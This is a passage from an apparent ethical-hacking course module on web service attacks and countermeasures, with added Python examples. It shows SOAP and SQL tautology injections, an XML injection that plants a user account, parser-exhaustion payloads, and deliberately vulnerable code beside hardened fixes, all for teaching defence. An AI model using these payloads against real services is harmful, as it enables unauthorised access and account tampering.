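    store.login(planted_sid, "victim")                # victim logs in carrying the planted ID
    return store.user_for(planted_sid) == "victim"


if __name__ == "__main__":
    print("hijacked with fixation-prone store:", fixation_scenario(FixationProneStore))
    print("hijacked with rotating store:", fixation_scenario(RotatingSessionStore))
```

The rotation has to happen on the server's own authority; a new cookie value chosen by the client is no better than the planted one.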
  • 174. Web App Hacking Methodology: Attack Web Services

Methodology steps shown: Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services.

Web services are easily targeted by attackers. Serious security breaches are caused when an attacker compromises web services. The different types of web service attacks and their consequences are explained on the following slides.
  • 175. Attack Web Services

Web services work atop legacy web applications, and any attack on a web service will immediately expose an underlying application's business and logic vulnerabilities to various attacks.

Web services can be attacked using many techniques, as they are made available to users through various mechanisms; hence, the number of possible vulnerabilities increases. The attacker can exploit those vulnerabilities to compromise the web services. There may be many reasons behind attacking web services, and the attacker chooses the attack according to that purpose. If the attacker's intention is to stop a web service from serving its intended users, the attacker can launch a denial-of-service attack by sending numerous requests. Various types of attacks used against web services are:
SOAP Injection
XML Injection
WSDL Probing Attacks
Information Leakage
Application Logic Attacks
Database Attacks
  • 176. [Figure 13.52: Attack Web Services. Attacks shown against the web services layer: SOAP Injection, XML Injection, WSDL Probing Attacks, Information Leakage, Application Logic Attacks, Database Attacks, DoS Attacks.]
  • 177. Web Services Probing Attacks

In the first step, the attacker traps the WSDL document from web service traffic and analyzes it to determine the purpose of the application, its functional breakdown, entry points, and message types. These attacks work similarly to SQL injection attacks.

The attacker then creates a set of valid requests by selecting a set of operations and formulating the request messages according to the rules of the XML Schema that can be submitted to the web service.

The attacker uses these requests to include malicious content in SOAP requests and analyzes the resulting errors to gain a deeper understanding of potential security weaknesses.

[Figure 13.53: Web Services Probing Attacks. The attacker injects an arbitrary character (') in the input field of a SOAP request to the GetProductInformationByName operation (namespace http://juggyboy/ProductInfo/; fields name, uid 312-111-8543, password 5648). The server throws an error: a SOAP fault with faultcode soap:Server and a faultstring beginning System.Web.Services.Protocols.SoapException: Server was unable to process request -> System.Data.OleDb.OleDbException: Syntax error (missing operator) in query expression, quoting the backend query fragment productname like ... and providerid = '312-111-8543'. The faultstring continues with a stack trace through System.Data.OleDb.OleDbCommand.ExecuteReader() down to ProductInfo.ProductDBAccess.GetProductInformation(String productName, String uid, String password), revealing the query structure and code paths to the attacker.]
  • 178. Web Service Attacks: SOAP Injection

Simple Object Access Protocol (SOAP) is a lightweight and simple XML-based protocol that is designed to exchange structured and typed information on the web. The XML Envelope element is always the root element of the SOAP message in the XML schema. The attacker injects malicious query strings into the user input field to bypass web services authentication mechanisms and access backend databases. This attack works similarly to SQL injection attacks.

[Figure 13.54: SOAP Injection. The Account Login form at http://juggyboy.com/ws/products.asmx is submitted with an injection string in the Password field; the resulting SOAP request and the server's response are shown below.]

Request sent by the attacker:
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<SOAP-ENV:Envelope xmlns:SOAPSDK1="http://www.w3.org/2001/XMLSchema" xmlns:SOAPSDK2="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPSDK3="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <SOAPSDK4:GetProductInformationByName xmlns:SOAPSDK4="http://juggyboy/ProductInfo/">
      <SOAPSDK4:name>%</SOAPSDK4:name>
      <SOAPSDK4:uid>312-111-8543</SOAPSDK4:uid>
      <SOAPSDK4:password>' Or 1=1 Or blah = 1</SOAPSDK4:password>
    </SOAPSDK4:GetProductInformationByName>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Server Response:
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <GetProductInformationByNameResponse xmlns="http://juggyboy/ProductInfo/">
      <GetProductInformationByNameResult>
        <productId>25</productId>
        <productName>Painting101</productName>
        <productQuantity>3</productQuantity>
        <productPrice>1500</productPrice>
      </GetProductInformationByNameResult>
    </GetProductInformationByNameResponse>
  </soap:Body>
</soap:Envelope>
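Figures 13.53 and 13.54 show the two halves of the same defect: SOAP field values spliced into SQL, and exception text echoed back in the SOAP fault. The block below is an added example, not code from the course material, that reproduces both behaviours against a constructed in-memory SQLite backend holding the figure's user (uid 312-111-8543) and product (Painting101), then shows the hardened endpoint: bound parameters, and a generic fault that keeps the exception detail on the server. The SOAP envelope builder, the table layout and the classic `' OR '1'='1` password (a variant of the figure's string) are constructed for the demo; the namespaces are the ones in the figures.

```python
import sqlite3
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Namespaces as they appear in the figures on these slides.
NS = {"soap": "http://schemas.xmlsoap.org/soap/envelope/",
      "p": "http://juggyboy/ProductInfo/"}


def make_db():
    """Constructed in-memory backend mirroring the figure's data (one user, one product)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid TEXT, password TEXT)")
    db.execute("CREATE TABLE products (providerid TEXT, productname TEXT, price INTEGER)")
    db.execute("INSERT INTO users VALUES ('312-111-8543', '5648')")
    db.execute("INSERT INTO products VALUES ('312-111-8543', 'Painting101', 1500)")
    return db


def soap_request(name, uid, password):
    """Build a GetProductInformationByName request shaped like the one in Figure 13.54."""
    return f"""<SOAP-ENV:Envelope xmlns:SOAP-ENV="{NS['soap']}">
  <SOAP-ENV:Body>
    <p:GetProductInformationByName xmlns:p="{NS['p']}">
      <p:name>{escape(name)}</p:name>
      <p:uid>{escape(uid)}</p:uid>
      <p:password>{escape(password)}</p:password>
    </p:GetProductInformationByName>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""


def parse_request(xml_text):
    """Extract the operation's child elements as {local-name: text}."""
    op = ET.fromstring(xml_text).find("soap:Body/p:GetProductInformationByName", NS)
    return {child.tag.split("}")[1]: (child.text or "") for child in op}


def handle_request(db, xml_text, hardened):
    """Service endpoint in two flavours. hardened=False splices field values into SQL and
    echoes exception text in the fault (what the probing figure exploits); hardened=True
    binds parameters and returns a generic fault. Returns a (kind, ...) tuple."""
    req = parse_request(xml_text)
    try:
        if hardened:
            ok = db.execute("SELECT 1 FROM users WHERE uid = ? AND password = ?",
                            (req["uid"], req["password"])).fetchone()
            if not ok:
                return ("Fault", "Client", "authentication failed")
            row = db.execute("SELECT productname, price FROM products "
                             "WHERE productname LIKE ? AND providerid = ?",
                             (req["name"], req["uid"])).fetchone()
        else:
            ok = db.execute(f"SELECT 1 FROM users WHERE uid = '{req['uid']}' "
                            f"AND password = '{req['password']}'").fetchone()
            if not ok:
                return ("Fault", "Client", "authentication failed")
            row = db.execute(f"SELECT productname, price FROM products WHERE productname "
                             f"LIKE '{req['name']}' AND providerid = '{req['uid']}'").fetchone()
        return ("Result", row)
    except sqlite3.Error as exc:
        if hardened:
            # Detail belongs in the server log, not on the wire: nothing about the query leaks.
            return ("Fault", "Server", "unable to process request")
        return ("Fault", "Server", f"Server was unable to process request -> {exc}")


if __name__ == "__main__":
    db = make_db()
    probe = soap_request("'", "312-111-8543", "5648")            # the figure's single quote
    injection = soap_request("Painting101", "312-111-8543", "' OR '1'='1")
    for label, req in (("probe", probe), ("injection", injection)):
        print(label, "vulnerable:", handle_request(db, req, hardened=False))
        print(label, "hardened:  ", handle_request(db, req, hardened=True))
```

With the hardened endpoint the probe returns an empty result and the injected password simply fails authentication; neither response tells the sender anything about the query behind the operation, which is what makes the probing step on the previous slide unproductive.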
  • 179. Web Service Attacks: XML Injection

The process in which the attacker enters values that query XML with values that take advantage of exploits is known as an XML injection attack. Attackers inject XML data and tags into user input fields to manipulate the XML schema or populate the XML database with bogus entries. XML injection can be used to bypass authorization, escalate privileges, and generate web services DoS attacks.

[Figure 13.55: XML Injection. The Account Login form at http://juggyboy.com/ws/login.asmx is submitted with Username Mark, Password 12345 and an E-mail field containing mark@certifiedhacker.com</mail></user><user><username>Jason</username><password>attack</password><userid>105</userid><mail>jason@juggyboy.com, which creates a new user account on the server.]

Server Side Code (the final <user> element is the one created by the injected E-mail value):
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
  <user>
    <username>gandalf</username>
    <password>!c3</password>
    <userid>101</userid>
    <mail>gandalf@middleearth.com</mail>
  </user>
  <user>
    <username>Mark</username>
    <password>12345</password>
    <userid>102</userid>
    <mail>gandalf@middleearth.com</mail>
  </user>
  <user>
    <username>jason</username>
    <password>attck</password>
    <userid>105</userid>
    <mail>jason@juggyboy.com</mail>
  </user>
</users>
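The figure's E-mail value works because the server formats form fields straight into the XML text, so a value that closes `</mail></user>` and opens a new `<user>` becomes structure rather than data. The block below is an added example, not code from the course material: the vulnerable append, the fix (building the record through the DOM API, which serialises field values as escaped text), a parse-back that shows how many accounts each version created, and a simple markup check for input validation or logging. The starting document (only gandalf's record) is constructed; the injected value is the one from the figure.

```python
import xml.etree.ElementTree as ET

# Constructed starting document: the first account record from the slide's server-side XML.
EXISTING_USERS = (
    "<users><user><username>gandalf</username><password>!c3</password>"
    "<userid>101</userid><mail>gandalf@middleearth.com</mail></user></users>"
)

# The E-mail field value shown in Figure 13.55: it closes Mark's record and opens a second one.
INJECTED_MAIL = ("mark@certifiedhacker.com</mail></user><user><username>Jason</username>"
                 "<password>attack</password><userid>105</userid><mail>jason@juggyboy.com")


def add_user_naive(users_xml, username, password, userid, mail):
    """Vulnerable: form fields are formatted straight into the XML text, so markup inside a
    field becomes part of the document structure (the pattern behind the figure)."""
    record = (f"<user><username>{username}</username><password>{password}</password>"
              f"<userid>{userid}</userid><mail>{mail}</mail></user>")
    return users_xml.replace("</users>", record + "</users>")


def add_user_safe(users_xml, username, password, userid, mail):
    """Fixed: build the record through the DOM API, which serialises field values as text
    (escaping <, > and &), so a field can never add elements of its own."""
    root = ET.fromstring(users_xml)
    user = ET.SubElement(root, "user")
    for tag, value in (("username", username), ("password", password),
                       ("userid", userid), ("mail", mail)):
        ET.SubElement(user, tag).text = value
    return ET.tostring(root, encoding="unicode")


def contains_markup(value):
    """Validation / logging check: a username or e-mail never legitimately contains these
    characters, so their presence is a strong XML-injection indicator."""
    return any(ch in value for ch in "<>&")


def list_users(users_xml):
    """Parse the store back and return (username, userid, mail) per record."""
    root = ET.fromstring(users_xml)
    return [(u.findtext("username"), u.findtext("userid"), u.findtext("mail"))
            for u in root.findall("user")]


if __name__ == "__main__":
    naive = add_user_naive(EXISTING_USERS, "Mark", "12345", "102", INJECTED_MAIL)
    safe = add_user_safe(EXISTING_USERS, "Mark", "12345", "102", INJECTED_MAIL)
    print("naive store:", [u[0] for u in list_users(naive)])     # a third account appears
    print("safe store: ", [u[0] for u in list_users(safe)])      # Mark only, mail kept as text
    print("markup in field:", contains_markup(INJECTED_MAIL))
```

Escaping is what prevents the injection; the `contains_markup` check is additional and useful mainly because it turns an attempt into a log line, whereas the escaped store would silently accept the odd-looking address.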
  • 180. Web Services Parsing Attacks

Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a denial-of-service attack or generate logical errors in web service request processing.

A parsing attack takes place when an attacker succeeds in modifying the file request or string. The attacker changes the values by superimposing one or more operating system commands via the request. Parsing is possible when the attacker executes .bat (batch) or .cmd (command) files.

Recursive Payloads
XML can easily nest or arrange elements within a single document to address complex relationships. An attacker queries web services with a grammatically correct SOAP document that contains infinite processing loops, resulting in exhaustion of XML parser and CPU resources.

Oversize Payloads
XML is relatively verbose, and potentially large files must always be considered when protecting the infrastructure; programmers will limit the document's size. Attackers send a payload that is excessively large to consume all system resources, rendering web services inaccessible to other legitimate users.
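Both payload classes above are defeated by limits enforced while the document is being read, before any application logic sees it. The block below is an added example, not code from the course material: a streaming check built on Python's expat binding that rejects a document for total size (oversize payloads), for element nesting depth (recursive payloads) and for any entity declaration (the usual source of self-referencing expansion loops), returning a reason a front-end filter can log. The limits, the `PayloadRejected` class and the `make_nested` generator are constructed for the demo.

```python
import xml.parsers.expat


class PayloadRejected(Exception):
    """Raised when a document breaches one of the parser limits."""


def parse_with_limits(data, max_bytes=1_000_000, max_depth=32):
    """Stream-parse `data` (bytes) while enforcing three limits: total size, element nesting
    depth, and a ban on entity declarations. Returns the deepest nesting level seen."""
    if len(data) > max_bytes:
        raise PayloadRejected(f"payload of {len(data)} bytes exceeds {max_bytes}")

    parser = xml.parsers.expat.ParserCreate()
    depth = deepest = 0

    def start_element(name, attrs):
        nonlocal depth, deepest
        depth += 1
        deepest = max(deepest, depth)
        if depth > max_depth:
            raise PayloadRejected(f"nesting deeper than {max_depth} at <{name}>")

    def end_element(name):
        nonlocal depth
        depth -= 1

    def entity_decl(*_):
        # Web service requests have no business declaring entities; refusing them closes
        # the door on entity-expansion loops outright.
        raise PayloadRejected("entity declarations are not accepted")

    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.EntityDeclHandler = entity_decl
    parser.Parse(data, True)
    return deepest


def check_payload(data, **limits):
    """Front-door check for a web service endpoint: 'ok' or 'rejected: <reason>'."""
    try:
        parse_with_limits(data, **limits)
        return "ok"
    except PayloadRejected as exc:
        return f"rejected: {exc}"
    except xml.parsers.expat.ExpatError as exc:
        return f"rejected: malformed XML ({exc})"


def make_nested(depth):
    """Constructed recursive payload: `depth` nested <a> elements."""
    return b"<a>" * depth + b"</a>" * depth


if __name__ == "__main__":
    samples = {
        "shallow document": make_nested(10),
        "recursive payload": make_nested(200),
        "oversize payload": b"<a>" + b"x" * 2_000_000 + b"</a>",
        "entity declaration": b'<!DOCTYPE a [<!ENTITY x "y">]><a>&x;</a>',
    }
    for label, payload in samples.items():
        print(f"{label}: {check_payload(payload)}")
```

Because the checks run inside the parser callbacks, a rejected document stops being processed at the offending point; the depth limit in particular fires long before the parser's own stack would, which is the difference between a logged rejection and an exhausted worker.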
  • 181. Web Service Attack Tool: soapUI

Source: http://www.soapui.org

soapUI is an open source functional testing tool, mainly used for web service testing. It supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC. It enables you to create advanced performance tests very quickly and run automated functional tests. With the help of this tool, attackers can easily perform web services probing, SOAP injection, XML injection, and web services parsing attacks.

  • 182. [Figure 13.56: soapUI Tool Screenshot, showing a sample-service project with its WSDL (buyRequest, buyResponse, login, logout and search messages) and a request editor with its request properties (endpoint, encoding, authentication and WSS settings).]
  • 183. Web Service Attack Tool: XMLSpy
Altova XMLSpy is the XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies.
Web Service Attack Tool: XMLSpy
Source: http://www.altova.com
Altova XMLSpy is the XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies. It offers a graphical schema designer, Smart Fix validation, a code generator, file converters, debuggers, profilers, full database integration, and support for WSDL, SOAP, XSLT, XPath, XQuery, XBRL, and Open XML documents, plus Visual Studio and Eclipse plug-ins, and more.
  • 184. FIGURE 13.57: XMLSpy Tool Screenshot (the XSLT debugger view with call stack, XPath watch, and result document panes; image not included in this transcript)
  • 185. Module Flow
So far, we have discussed web application concepts, the threats associated with web applications, and the hacking methodology. Now we will discuss hacking tools. These tools help attackers retrieve sensitive information and also craft and send malicious packets or requests to the victim. Web application hacking tools are specially designed for identifying vulnerabilities in web applications. With the help of these tools, an attacker can easily exploit the identified vulnerabilities and carry out web application attacks.
Module flow: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing
  • 186. This section lists and describes various web application hacking tools such as Burp Suite Professional, CookieDigger, WebScarab, and so on.
  • 187. Web Application Hacking Tool: Burp Suite Professional
Source: http://www.portswigger.net
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface through to finding and exploiting security vulnerabilities. Burp Suite contains key components such as an intercepting proxy, an application-aware spider, an advanced web application scanner, an intruder tool, a repeater tool, a sequencer tool, etc.
  • 188. FIGURE 13.58: Burp Suite Professional Tool Screenshot (Intruder attack results window and the payload positions tab; image not included in this transcript)
  • 189. Web Application Hacking Tool: CookieDigger
- CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications
- It works by collecting and analyzing cookies issued by a web application for multiple users
- The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, is included in the cookie values
Web Application Hacking Tool: CookieDigger
Source: http://www.mcafee.com
CookieDigger is a tool that detects vulnerable cookie generation and the insecure implementation of session management by web applications. The tool is based on the collection and evaluation of the cookies that a web application issues to many users. The certainty (predictability) and entropy of the cookie are the factors on which the tool relies. It also reports whether the cookie values contain valuable information such as the login details of the user (user name and password).
  • 190. FIGURE 13.59: CookieDigger Tool Screenshot (Foundstone CookieDigger window with the POST data and visited URLs panes; image not included in this transcript)
  • 191. Web Application Hacking Tool: WebScarab
WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols. It allows the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser.
Web Application Hacking Tool: WebScarab
Source: http://www.owasp.org
WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols. It is written in Java, and is thus portable to many platforms. WebScarab has several modes of operation, implemented by a number of plugins. It operates as an intercepting proxy, allowing the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. It is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab.
  • 192. FIGURE 13.60: WebScarab Tool Screenshot (Summary tab with the URL tree and the conversation list; image not included in this transcript)
  • 193. Web Application Hacking Tools
A few more tools that can be used for hacking web applications are listed as follows:
- Instant Source available at http://www.blazingtools.com
- w3af available at http://w3af.sourceforge.net
- GNU Wget available at http://gnuwin32.sourceforge.net
- BlackWidow available at http://softbytelabs.com
- cURL available at http://curl.haxx.se
- HttpBee available at http://www.oOo.nu
- Teleport Pro available at http://www.tenmax.com
- WebCopier available at http://www.maximumsoft.com
- HTTrack available at http://www.httrack.com
- MileSCAN ParosPro available at http://www.milescan.com
  • 194. Module Flow
So far, we have discussed various concepts such as the threats associated with web applications, the hacking methodology, and hacking tools. All these topics describe how the attacker breaks into a web application or a website. Now we will discuss web application countermeasures. Countermeasures are the practice of using multiple security systems or technologies to prevent intrusions. They are the key components for protecting and safeguarding the web application against web application attacks.
Module flow: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing
  • 195. This section highlights various ways in which you can defend against web application attacks such as SQL injection attacks, command injection attacks, XSS attacks, etc.
  • 196. Encoding Schemes
Web applications employ different encoding schemes for their data to safely handle unusual characters and binary data in the way you intend.
URL encoding is the process of converting a URL into valid ASCII format so that data can be safely transported over HTTP. URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in hexadecimal, such as:
- %3d =
- %0a newline
- %20 space
An HTML encoding scheme is used to represent unusual characters so that they can be safely combined within an HTML document. It defines several HTML entities to represent particular characters.
Encoding Schemes
The HTTP protocol and the HTML language are the two major components of web applications. Both components are text based. Web applications employ encoding schemes to ensure that both components handle unusual characters and binary data safely. The encoding schemes include:
URL Encoding
URLs are permitted to contain only the printable characters of the ASCII code within the range 0x20-0x7e inclusive. Several characters within this range have special meaning when they appear in the URL scheme or the HTTP protocol, so such characters are restricted. URL encoding is the process of converting URLs into valid ASCII format so that data can be safely transported over HTTP. URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in hexadecimal, such as:
- %3d =
- %0a newline
- %20 space
  • 197. HTML Encoding
The HTML encoding scheme is used to represent unusual characters so that they can be safely entered within an HTML document as part of its content. The structure of the document is defined by various characters. If you want to use the same characters as part of the document's content, you may face a problem. This problem can be overcome by using HTML encoding. It defines several HTML entities to represent particular characters, such as:
- &amp; &
- &lt; <
- &gt; >
  • 198. Encoding Schemes (Cont'd)
Hex Encoding: An HTML encoding scheme uses the hex value of every character to represent a collection of characters for transmitting binary data.
Base64 Encoding: A Base64 encoding scheme represents any binary data using only printable ASCII characters.
Example: Hello A125C458D8, Jason 123B684AD9
Encoding Schemes (Cont'd)
Hex Encoding
An HTML encoding scheme uses the hex value of every character to represent a collection of characters for transmitting binary data.
Example:
Hello A125C458D8
Jason 123B684AD9
Base64 Encoding
Base64 schemes are used to encode binary data. A Base64 encoding scheme represents any binary data using only printable ASCII characters. It is usually used for encoding email attachments for safe transmission over SMTP, and also for encoding user credentials.
Example: cake 01100011 01100001 01101011 01100101
Base64 encoding: 011000 110110 000101 101011 011001 010000 000000 000000
Unicode Encoding
Unicode is a character encoding standard that is designed to support all of the writing systems used in the world. In web application hacking, Unicode encoding is used to bypass input filters.
16-bit Unicode encoding: It replaces unusual Unicode characters with "%u" followed by the character's Unicode code point expressed in hexadecimal: %u2215 / ; %u00e9
UTF-8: It is a variable-length encoding standard that uses each byte expressed in hexadecimal and preceded by the % prefix: %c2%a9 ; %e2%89%a0
TABLE 13.2: Encoding Schemes Table
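The schemes in Table 13.2 are easiest to understand by running them. The following Python example is added here and is not part of the CEH material; it uses only the standard library and shows URL (percent) encoding, HTML entity encoding, hex, Base64 with the 6-bit regrouping the table shows for "cake", the 16-bit %uXXXX form and UTF-8 percent encoding, and finally the canonicalization step a defensive input filter must perform before it inspects a value (otherwise an encoded spelling of a character slips past a check for the literal one). All sample strings are constructed.

```python
import base64
import html
import re
from urllib.parse import quote, unquote


def url_encode(text: str) -> str:
    """Percent-encode every character outside the unreserved set: '%' + two hex digits."""
    return quote(text, safe="")


def html_encode(text: str) -> str:
    """Replace the characters that define HTML structure (&, <, >, quotes) with entities."""
    return html.escape(text, quote=True)


def hex_encode(data: bytes) -> str:
    """Two hex digits per byte, e.g. for carrying binary data in a text field."""
    return data.hex()


def base64_bit_groups(data: bytes) -> list:
    """Regroup the 8-bit bytes into the 6-bit groups that Base64 maps to its alphabet.
    The last group is zero-padded; Base64 then appends '=' for each missing input byte."""
    bits = "".join(f"{byte:08b}" for byte in data)
    bits += "0" * (-len(bits) % 6)
    return [bits[i:i + 6] for i in range(0, len(bits), 6)]


def base64_encode(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


def unicode_u_encode(text: str) -> str:
    """16-bit Unicode form: non-ASCII code points become %u followed by four hex digits."""
    out = []
    for ch in text:
        cp = ord(ch)
        if cp < 0x80:
            out.append(ch)
        elif cp <= 0xFFFF:
            out.append(f"%u{cp:04x}")
        else:
            raise ValueError("code points outside the BMP have no %uXXXX form")
    return "".join(out)


def utf8_percent_encode(text: str) -> str:
    """UTF-8 form: each byte of the character's UTF-8 encoding expressed as %XX."""
    out = []
    for ch in text:
        if ord(ch) < 0x80:
            out.append(ch)
        else:
            out.append("".join(f"%{b:02x}" for b in ch.encode("utf-8")))
    return "".join(out)


_PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def canonicalize(value: str) -> str:
    """Defensive step: decode the %uXXXX form and then ordinary percent-encoding (UTF-8)
    so that a filter compares the real characters, not one of their encoded spellings."""
    decoded = _PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), value)
    return unquote(decoded)
```

canonicalize() is the part to remember: a filter that rejects "<" but is handed "%u003c" sees nothing wrong, which is exactly the bypass the table's Unicode row refers to.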
  • 199. How to Defend Against SQL Injection Attacks
- Limit the length of user input
- Use custom error messages
- Monitor DB traffic using an IDS, WAF
- Disable commands like xp_cmdshell
- Isolate database server and web server
- Always use method attribute set to POST
- Run database service account with minimal rights
- Move extended stored procedures to an isolated server
- Use typesafe variables or functions such as IsNumeric() to ensure typesafety
- Validate and sanitize user inputs passed to the database
- Use low privileged account for DB connection
How to Defend Against SQL Injection Attacks
To defend against SQL injection attacks, various things have to be taken care of: unchecked user input to database queries should not be allowed to pass. Every user variable passed to the database should be validated and sanitized. The given input should be checked for the expected data type. User input that is passed to the database should be quoted.
  • 200. (The countermeasure list above continues here in the original: use a low privileged account for the DB connection.)
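Several of the countermeasures above (limit input length, validate and type-check input, pass it to the database as a bound parameter, return a custom error message) in one runnable Python example. It is added here and is not part of the CEH material; it uses the standard sqlite3 module with a constructed in-memory users table, and find_user_unsafe exists only to contrast the concatenated query with the parameterised one.

```python
import re
import sqlite3

MAX_INPUT_LEN = 32
USERNAME_RE = re.compile(r"[A-Za-z0-9_]+")  # allow-list of characters a user name may contain


def build_demo_db() -> sqlite3.Connection:
    """Constructed sample data; a real deployment would connect with a low-privilege account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "user"), ("bob", "user"), ("admin", "admin")],
    )
    return conn


def find_user_unsafe(conn: sqlite3.Connection, username: str) -> list:
    """The vulnerable pattern: user input is spliced into the SQL text and parsed as SQL."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_param(conn: sqlite3.Connection, username: str) -> list:
    """Parameterised query: the value is bound by the driver and never parsed as SQL."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def validate_username(raw: str) -> str:
    """Length limit plus a character allow-list; reject bad input rather than 'cleaning' it."""
    if len(raw) > MAX_INPUT_LEN:
        raise ValueError("input too long")
    if not USERNAME_RE.fullmatch(raw):
        raise ValueError("invalid characters in user name")
    return raw


def to_user_id(raw: str) -> int:
    """Type-safe conversion, the equivalent of checking IsNumeric() before use."""
    if not raw.isdigit():
        raise ValueError("id must be numeric")
    return int(raw)


GENERIC_ERROR = "Request could not be processed."  # custom error message shown to the client


def handle_lookup(conn: sqlite3.Connection, raw_username: str) -> tuple:
    """Request handler: validate, query with a parameter, never leak DB errors to the client."""
    try:
        username = validate_username(raw_username)
        return ("ok", find_user_param(conn, username))
    except (ValueError, sqlite3.Error):
        # details belong in the server log, not in the HTTP response
        return ("error", GENERIC_ERROR)


def handle_lookup_by_id(conn: sqlite3.Connection, raw_id: str) -> tuple:
    """Same pattern for a numeric key: convert first, then bind the integer."""
    try:
        uid = to_user_id(raw_id)
        rows = conn.execute("SELECT username, role FROM users WHERE id = ?", (uid,)).fetchall()
        return ("ok", rows)
    except (ValueError, sqlite3.Error):
        return ("error", GENERIC_ERROR)
```

Note the two independent layers: even when validation is skipped, find_user_param returns nothing for the classic tautology input because the whole string is compared as a value; validation then rejects it before the database is touched at all.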
  • 201. How to Defend Against Command Injection Flaws
How to Defend Against Command Injection Flaws
The simplest way to protect against command injection flaws is to avoid them wherever possible. Some language-specific libraries perform identical functions to many shell commands and some system calls. These libraries do not invoke the operating system shell interpreter, and so avoid most shell command problems. For those calls that must still be used, such as calls to backend databases, one must carefully validate the data to ensure that it does not contain malicious content. One can also structure requests in a pattern that ensures all given parameters are treated as data instead of potentially executable content. Most system calls, the use of stored procedures with parameters that accept valid input strings to access a database, and prepared statements provide significant protection by ensuring that the supplied input is treated as data; this reduces, but does not completely eliminate, the risk involved in these external calls.
One can always validate the input to ensure the protection of the application in question. Least privileged accounts must be used to access a database so that there is the smallest possible loophole. The other strong protection against command injection is to run web applications with only the privileges required to carry out their functions. Therefore, one should avoid running the web server as root, or accessing a database as a DB ADMIN, or else an attacker may be able to misuse administrative rights. The use of the Java sandbox in J2EE environments stops the execution of system commands.
  • 202. When an external command is used, thoroughly check any user information that is inserted into the command. Create a mechanism for handling all possible errors, timeouts, or blockages during the calls. To ensure the expected work is actually performed, check all the output, return, and error codes from the call. At the least, this allows the user to determine if something has gone wrong. Otherwise, an attack may occur and never be detected.
- Perform input validation
- Use language-specific libraries that avoid problems due to shell commands
- Use a safe API that avoids the use of the interpreter entirely
- Use parameterized SQL queries
- Escape dangerous characters
- Perform input and output encoding
- Structure requests so that all supplied parameters are treated as data, rather than potentially executable content
- Use modular shell disassociation from kernel
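The command injection countermeasures above, as an added Python example that is not part of the CEH material: an allow-list validator, the shell-string construction that is the source of the flaw shown beside the argv-list form that never reaches a shell, escaping for the case where a shell string is unavoidable, a library call used instead of an external command, and a runner that checks return codes and enforces a timeout. The host-name check and the nslookup argv are constructed for illustration and are never executed; echo_argument runs the Python interpreter itself so the demonstration works anywhere Python does.

```python
import os
import re
import shlex
import subprocess
import sys

# Allow-list: letters, digits, dots and hyphens only, so no shell metacharacter can pass.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})")


def is_valid_hostname(raw: str) -> bool:
    return HOSTNAME_RE.fullmatch(raw) is not None


def validate_hostname(raw: str) -> str:
    """Reject anything that is not a plain host name; do not try to strip bad characters."""
    if not is_valid_hostname(raw):
        raise ValueError("invalid host name")
    return raw


def build_command_unsafe(raw_host: str) -> str:
    """The vulnerable pattern: one string handed to a shell, metacharacters and all.
    Shown for contrast only; it is never executed here."""
    return f"nslookup {raw_host}"


def build_argv_safe(raw_host: str) -> list:
    """Validated input placed in an argv list: each element is data, nothing is parsed by a shell."""
    return ["nslookup", validate_hostname(raw_host)]


def escape_for_shell(raw: str) -> str:
    """If a shell string truly cannot be avoided, quote the value so metacharacters stay literal."""
    return shlex.quote(raw)


def list_directory(path: str) -> list:
    """Language library instead of spawning `ls`: no interpreter is involved at all."""
    return sorted(os.listdir(path))


def run_checked(argv: list, timeout: float = 5.0) -> tuple:
    """Run without a shell, with a timeout, and return (returncode, stdout, stderr) so a
    failure is visible to the caller instead of being silently ignored."""
    try:
        proc = subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return (None, "", "timeout")
    return (proc.returncode, proc.stdout, proc.stderr)


def echo_argument(value: str) -> tuple:
    """Demonstration: the value travels as one argv element and the child prints it back
    verbatim, proving that a ';' in it was never interpreted as a command separator."""
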